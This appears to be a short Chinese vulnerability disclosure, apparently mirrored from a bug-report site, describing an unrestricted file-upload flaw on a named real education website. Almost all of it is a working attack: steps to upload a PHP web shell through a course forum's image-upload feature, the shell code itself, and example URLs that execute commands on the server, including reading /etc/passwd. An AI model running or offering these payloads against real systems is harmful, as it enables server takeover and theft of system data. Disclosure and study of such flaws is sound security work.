赞
踩
输入网址:http://www.ydma.cn/
1、随意注册一个账号
2、购买任意免费课程
3、进入该课程的讨论区
4、点击发表话题,点击上传图片。
- <?php
- $x = shell_exec($_GET['XX']);
- var_dump($x);
- ?>
复制返回地址到浏览器打开。
例如:http://www.ydma.cn/files/image/2015/11-18/765506617564c41053996b.php
or :http://www.ydma.cn/files/image/2015/11-18/1889937821564c46536c47e.php?XX=cat%20/etc/passwd
======================
我只是友情测试漏洞,并未深入
参见:https://bugs.shuimugan.com/bug/view?bug_no=154170
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。